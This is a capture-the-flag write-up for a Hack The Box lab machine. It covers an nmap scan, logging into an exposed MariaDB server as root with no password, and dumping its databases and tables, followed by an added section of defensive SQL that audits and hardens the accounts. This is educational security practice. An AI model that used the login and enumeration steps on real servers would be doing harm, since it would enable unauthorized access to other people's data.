Sequel Writeup

In the previous writeup, Appointment, I got a little exposure to SQL. I learned how a web application could use some sort of database to authenticate users and how that can be taken advantage of if not properly configured. For this box, I got to work with such a database directly which helped cement what I had learned previously.


Initial Recon

Started off with the standard nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Sequel]
└─$ sudo nmap -sC -sV -oA nmap/initial $tgt
[sudo] password for crimson: 
Sorry, try again.
[sudo] password for crimson: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-17 21:08 CDT
Nmap scan report for 10.129.82.245
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 66
|   Capabilities flags: 63486
|   Some Capabilities: DontAllowDatabaseTableColumn, Speaks41ProtocolNew, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, FoundRows, SupportsCompression, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ODBCClient, Support41Auth, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 1pbyZ7A#)BPKgHmnc##%
|_  Auth Plugin Name: mysql_native_password
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.57 seconds

There is a single port open – MySQL on port 3306.

Initial Access

MySQL

What is MySQL? It is an open-source relational database system. A single MySQL server can manage multiple databases, each database contains tables, and each table has columns holding the actual data.

Since the remote host is running MySQL on an open port, I tried to connect to it with the mysql command-line client. Use -h to specify the remote system’s IP, -P for the port it is listening on, -u for the username and -p to either supply a password or be prompted for one. After some guessing I was able to log in with the username root and no password.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Sequel]
└─$ mysql -h 10.129.82.245 -u root -P 3306 -p                                                                130 ⨯
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 77
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

After logging in, the banner shows it is running MariaDB, a community fork of MySQL. Not being familiar with the MariaDB command-line syntax, I had to do some research. Eventually I came across a command cheat sheet that proved very useful. It can be found here – hxxps[://]mariadb[.]com/wp-content/uploads/2021/08/mariadb-standard-developer_cheat-sheet_1113[.]pdf

The first thing I did was list the available databases with the show DATABASES; command; there are four.

MariaDB [(none)]> show DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.049 sec)

The htb database seems interesting, so I selected it with the use [INSERT DATABASE]; command. To list the tables within the current database, use the show TABLES; command.

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.051 sec)

I can see that there are two tables in the htb database. To pull every row from a table, use select * from [INSERT TABLE];. The config table holds the flag, simple as that!

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | <SNIP> |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.049 sec)

MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | [email protected] |
|  2 | lara     | [email protected]  |
|  3 | sam      | [email protected]   |
|  4 | mary     | [email protected]  |
+----+----------+------------------+
4 rows in set (0.052 sec)
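As an added example (not part of the original writeup), these are the checks and fixes a defender would run on this MariaDB 10.3 server after seeing the passwordless remote root login and the full table dumps above. The account name htb_app, the passwords and the application subnet are placeholders, and the 'root'@'%' host entry is an assumption about which row allowed the remote login.

```sql
-- Added example, not from the original writeup: audit and harden the
-- MariaDB 10.3 server after the passwordless root login shown above.
-- Assumptions: run as a local administrator; 'htb_app', the passwords
-- and the 10.10.10.0/24 application subnet are placeholders.

-- 1) Find accounts that authenticate with no password. On MariaDB 10.3
--    mysql.user still carries both the legacy Password column and
--    authentication_string; an empty hash in both means no password.
--    unix_socket accounts are excluded: they rely on the OS user, not a hash.
SELECT User, Host, plugin
FROM mysql.user
WHERE COALESCE(Password, '') = ''
  AND COALESCE(authentication_string, '') = ''
  AND plugin <> 'unix_socket';

-- 2) Find accounts that may log in from any host. A 'root'@'%' row is
--    the assumed reason the remote login in this writeup succeeded.
SELECT User, Host
FROM mysql.user
WHERE Host IN ('%', '');

-- 3) Show what that account can do: a remote root reads every database,
--    including the htb.config row that stores the flag.
SHOW GRANTS FOR 'root'@'%';

-- 4) Remediate: drop remote root, give local root a real password, and
--    give the application its own least-privilege account scoped to htb.
DROP USER IF EXISTS 'root'@'%';
ALTER USER 'root'@'localhost' IDENTIFIED BY 'REPLACE_WITH_STRONG_PASSWORD';
CREATE USER IF NOT EXISTS 'htb_app'@'10.10.10.0/255.255.255.0'
  IDENTIFIED BY 'REPLACE_WITH_A_DIFFERENT_STRONG_PASSWORD';
GRANT SELECT ON htb.users  TO 'htb_app'@'10.10.10.0/255.255.255.0';
GRANT SELECT ON htb.config TO 'htb_app'@'10.10.10.0/255.255.255.0';

-- 5) Re-run the two audit queries above; both should now return an empty set.
--    Outside SQL, also set bind-address=127.0.0.1 (or a private interface)
--    in the server's my.cnf so port 3306 is not exposed to every network.
```

The audit queries are read-only and safe to run on a live server; the remediation block changes authentication, so apply it in a maintenance window after confirming which host rows exist.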